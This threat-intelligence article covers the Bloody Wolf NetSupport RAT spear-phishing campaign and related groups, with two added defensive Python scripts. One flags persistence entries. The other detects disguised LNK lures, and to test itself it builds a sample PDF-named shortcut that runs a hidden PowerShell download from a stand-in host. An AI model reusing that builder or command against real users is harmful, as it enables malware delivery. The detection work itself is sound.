Bloody Wolf Targets Uzbekistan and Russia with NetSupport RAT via Spear-Phishing Campaign

Cybersecurity researchers have linked a targeted cyber campaign to the threat actor known as Bloody Wolf, which is actively infecting systems in Uzbekistan and Russia through spear-phishing emails that deliver the NetSupport Remote Access Trojan.

The activity is being monitored by cybersecurity firm Kaspersky under the tracking name Stan Ghouls. The group has been operational since at least 2023 and has a history of targeting organizations in the manufacturing, financial, and information technology sectors across Russia, Kyrgyzstan, Kazakhstan, and Uzbekistan.

Scale and Geographic Spread of the Campaign

Investigators estimate that approximately 50 victims have been affected in Uzbekistan, while at least 10 compromised devices have been confirmed in Russia. Smaller numbers of infections have also been observed in Kazakhstan, Turkey, Serbia, and Belarus.

Attack attempts were not limited to private enterprises. Devices within government bodies, logistics firms, healthcare facilities, and educational institutions were also targeted during the campaign.

According to Kaspersky, the focus on financial organizations suggests that monetary gain is likely the primary motivation. However, the extensive use of a remote access trojan also leaves open the possibility of espionage-related objectives.

Shift in Malware Strategy

The use of NetSupport RAT marks a notable change in Bloody Wolf’s tactics. In earlier operations, the group relied on STRRAT, also known as Strigoi Master. In November 2025, Group-IB documented phishing activity targeting organizations in Kyrgyzstan that distributed the same remote administration tool.

NetSupport is a legitimate remote management application, but threat actors frequently abuse it to maintain covert access to infected systems.

Infection Chain and Execution Flow

The attack chain begins with phishing emails carrying malicious PDF attachments. The documents contain embedded links that, once clicked, lead the victim to download a malicious loader.

The loader performs several actions in sequence. It first displays a fake error message to convince the victim that the file could not be executed. It then checks whether fewer than three previous attempts to install the RAT have been made. If that limit has already been reached, the loader halts and shows an error stating that the attempt limit has been exceeded.

If allowed to proceed, the loader downloads NetSupport RAT from external domains and launches it. Persistence is achieved through multiple mechanisms, including Startup folder scripts, Registry autorun entries using a batch file named run.bat, and scheduled tasks that ensure repeated execution.
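The three persistence locations named above (Startup folder, Run key, scheduled task) are exactly what an incident responder pulls first from a suspected host. The following Python triage script is an added example, not code from Kaspersky or from the page; it parses constructed samples of `reg query` output, a Task Scheduler XML export and a Startup-folder listing, and flags entries that launch `run.bat`, the NetSupport client or any batch file from a user-writable path. `run.bat` comes from the page; `client32.exe` is an assumed indicator (the NetSupport Manager client's executable name), which the page does not mention.

```python
"""Triage Windows persistence artifacts for the loader pattern described above:
Startup-folder scripts, a Run-key entry pointing at run.bat, and a scheduled task
that re-launches it. All inputs below are constructed samples, not real captures."""
import re
import xml.etree.ElementTree as ET

# run.bat is the batch-file name given on the page; client32.exe is the NetSupport
# Manager client binary (an assumed indicator, not something the page states).
SUSPICIOUS_NAMES = ("run.bat", "client32.exe")
# Paths a standard user can write to; a persistence entry launching a batch file
# from one of these is worth a look even when the file name differs.
USER_WRITABLE = re.compile(r"\\(users\\[^\\]+\\appdata|programdata|windows\\temp|users\\public)\\")
BATCH_FILE = re.compile(r"\.(bat|cmd)\b")
SCRIPT_EXTS = (".bat", ".cmd", ".vbs", ".js", ".ps1")

# Constructed: output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
REG_QUERY_OUTPUT = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Updater     REG_SZ    C:\Users\jdoe\AppData\Roaming\svc\run.bat
"""

# Constructed: a task definition in Task Scheduler's XML schema (`schtasks /query /xml`)
TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>cmd.exe</Command>
      <Arguments>/c C:\\Users\\jdoe\\AppData\\Roaming\\svc\\run.bat</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed: directory listing of the user's Startup folder
STARTUP_FILES = ["desktop.ini", "sync.cmd"]


def parse_run_keys(text):
    """Return (value name, command) pairs from `reg query` output lines
    of the form `NAME  REG_SZ  DATA` (REG_EXPAND_SZ is accepted too)."""
    entries = []
    for line in text.splitlines():
        m = re.match(r"\s+(\S+)\s+REG_(?:EXPAND_)?SZ\s+(.+?)\s*$", line)
        if m:
            entries.append((m.group(1), m.group(2)))
    return entries


def parse_task_actions(xml_text):
    """Return the full command line of every <Exec> action in a task XML export."""
    ns = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
    root = ET.fromstring(xml_text)
    cmds = []
    for ex in root.findall(".//t:Actions/t:Exec", ns):
        cmd = ex.findtext("t:Command", default="", namespaces=ns)
        args = ex.findtext("t:Arguments", default="", namespaces=ns)
        cmds.append(f"{cmd} {args}".strip())
    return cmds


def is_suspicious(command_line):
    """True if the command names a known indicator or runs a batch file
    from a user-writable location."""
    cl = command_line.lower()
    if any(name in cl for name in SUSPICIOUS_NAMES):
        return True
    return BATCH_FILE.search(cl) is not None and USER_WRITABLE.search(cl) is not None


def triage(run_entries, task_cmds, startup_files):
    """Combine the three sources into (source, label, command) findings."""
    findings = []
    for name, cmd in run_entries:
        if is_suspicious(cmd):
            findings.append(("run_key", name, cmd))
    for cmd in task_cmds:
        if is_suspicious(cmd):
            findings.append(("scheduled_task", "", cmd))
    for fname in startup_files:
        # Any script in the Startup folder is unusual on a managed workstation
        if fname.lower().endswith(SCRIPT_EXTS) or is_suspicious(fname):
            findings.append(("startup_folder", fname, fname))
    return findings


if __name__ == "__main__":
    hits = triage(parse_run_keys(REG_QUERY_OUTPUT), parse_task_actions(TASK_XML), STARTUP_FILES)
    for source, label, cmd in hits:
        print(f"{source:15} {label:10} {cmd}")
```

On a live host the three inputs would come from `reg query` against the HKCU and HKLM Run keys, `schtasks /query /xml` and a listing of both the per-user and the all-users Startup folders; the parsers above take that raw text unchanged.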

Possible Expansion into IoT Malware

Kaspersky researchers also identified Mirai botnet payloads hosted on infrastructure associated with Bloody Wolf. This discovery suggests that the threat actor may be expanding its capabilities to include attacks on Internet of Things devices.

With more than 60 confirmed targets, analysts describe the campaign as unusually large for a focused and well-planned operation, indicating significant investment and operational capacity.

Related Threat Activity in Russia

The disclosure follows several other cyber campaigns aimed at Russian organizations. One such actor, ExCobalt, has been observed exploiting known vulnerabilities and using credentials stolen from contractors to gain initial access to corporate networks. Positive Technologies has classified ExCobalt as one of the most dangerous groups currently targeting Russian entities.

These attacks involve multiple tools and techniques, including attempts to steal Telegram credentials and message histories, as well as Outlook Web Access credentials through malicious code injection.

Tools linked to these campaigns include the CobInt backdoor, ransomware families such as Babuk and LockBit, and PUMAKIT, a kernel-level rootkit designed to hide malicious activity and escalate privileges. Earlier versions of PUMAKIT were known as Facefish, Kitsune, and Megatsune. The Kitsune variant was previously linked by BI.ZONE to a separate threat cluster called Sneaky Wolf.

Another tool, Octopus, written in Rust, has been used to elevate privileges on compromised Linux systems.

Positive Technologies noted that the attackers have shifted their initial access strategy away from exploiting internet-facing corporate services and now prefer to breach primary targets indirectly through their contractors.

Emerging Threat Actors and New Campaigns

Russian state institutions, research organizations, and IT companies have also been targeted by a newly identified threat actor known as Punishing Owl. Active since December 2025, the group is suspected to be politically motivated and has leaked stolen data on dark web platforms. One of its social media accounts appears to be operated from Kazakhstan.

Punishing Owl's attacks rely on phishing emails containing password-protected ZIP files. The archives hold Windows shortcut (LNK) files disguised as PDF documents. When opened, the shortcut runs a PowerShell command that downloads a data-stealing malware called ZipWhisper, which exfiltrates sensitive information to a remote server.
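A shortcut posing as a PDF can be caught before it is ever double-clicked, because the `.lnk` file itself records the target and command-line arguments. The script below is an added example, not code from the researchers or the page: it builds a minimal shell link (MS-SHLLINK header plus StringData), packs it into an in-memory ZIP under a double-extension name, and then parses every `.lnk` in the archive to flag the traits described above (document-like double extension, PowerShell target, hidden-window switches, a remote download). The file name, URL and arguments are constructed; the archive is written unencrypted because Python's `zipfile` cannot write ZipCrypto, but `scan_archive` accepts `pwd=` for reading a real password-protected sample.

```python
"""Parse .lnk files inside an archive and flag shortcuts disguised as documents
that launch PowerShell. The LNK sample and archive below are constructed."""
import io
import re
import struct
import zipfile

# ShellLinkHeader CLSID 00021401-0000-0000-C000-000000000046, little-endian field layout
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELPATH, HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x04, 0x08, 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the launched window out of sight

# Constructed argument string; example.invalid is a reserved, non-resolving domain
SAMPLE_ARGS = '-w hidden -nop -c "iwr http://example.invalid/p -OutFile $env:TEMP\\p.exe"'


def build_lnk(relpath, workdir, args, icon):
    """Build a minimal .lnk with only StringData fields (no IDList, no LinkInfo)."""
    flags = HAS_RELPATH | HAS_WORKDIR | HAS_ARGS | HAS_ICON | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x80,
                         0, 0, 0, 0, 0, SW_SHOWMINNOACTIVE, 0, 0, 0, 0)

    def string_data(s):  # CountCharacters (u16) followed by UTF-16LE characters
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relpath) + string_data(workdir) + string_data(args) + string_data(icon)


def parse_lnk(data):
    """Return the StringData fields and ShowCommand of a shell link."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_cmd = struct.unpack_from("<I", data, 60)[0]
    pos = 0x4C
    if flags & HAS_ID_LIST:          # IDListSize (u16) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:        # LinkInfoSize (u32) includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {"show_command": show_cmd}
    for bit, name in ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                      (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                      (HAS_ICON, "icon_location")):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def assess_lnk(filename, fields):
    """List the reasons a shortcut looks like a lure; empty list means nothing seen."""
    reasons = []
    if re.search(r"\.(pdf|docx?|xlsx?)\.lnk$", filename.lower()):
        reasons.append("disguised as document (double extension)")
    target = (fields.get("relative_path", "") + " " + fields.get("arguments", "")).lower()
    if "powershell" in target or "pwsh" in target:
        reasons.append("launches PowerShell")
    if re.search(r"-(w|win|windowstyle)\s+hidden", target) or "-nop" in target or "bypass" in target:
        reasons.append("hidden or restriction-bypassing PowerShell switches")
    if re.search(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|https?://", target):
        reasons.append("fetches content from a remote URL")
    if fields["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("ShowCommand hides the window")
    return reasons


def scan_archive(zip_bytes, pwd=None):
    """Map each .lnk entry in the archive to its list of findings."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            try:
                results[info.filename] = assess_lnk(info.filename, parse_lnk(zf.read(info, pwd=pwd)))
            except ValueError as err:
                results[info.filename] = [str(err)]
    return results


def build_sample_archive():
    """Constructed lure archive: one disguised shortcut plus a benign text file."""
    lnk = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                    r"C:\Windows\System32", SAMPLE_ARGS, r"%SystemRoot%\System32\imageres.dll")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Complaint_2026-01.pdf.lnk", lnk)
        zf.writestr("readme.txt", "benign text")
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in scan_archive(build_sample_archive()).items():
        print(name, "->", "; ".join(reasons) or "no findings")
```

Real lures usually also carry an IDList and LinkInfo block; the parser skips both by their size fields, so the StringData offsets stay correct for those as well.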

Another campaign targeting Russia and Belarus has been attributed to a group known as Vortex Werewolf. The attackers aim to deploy Tor and OpenSSH to establish long term remote access. This activity was previously documented in November 2025 by Cyble and Seqrite Labs, with the latter referring to the operation as Operation SkyCloak.
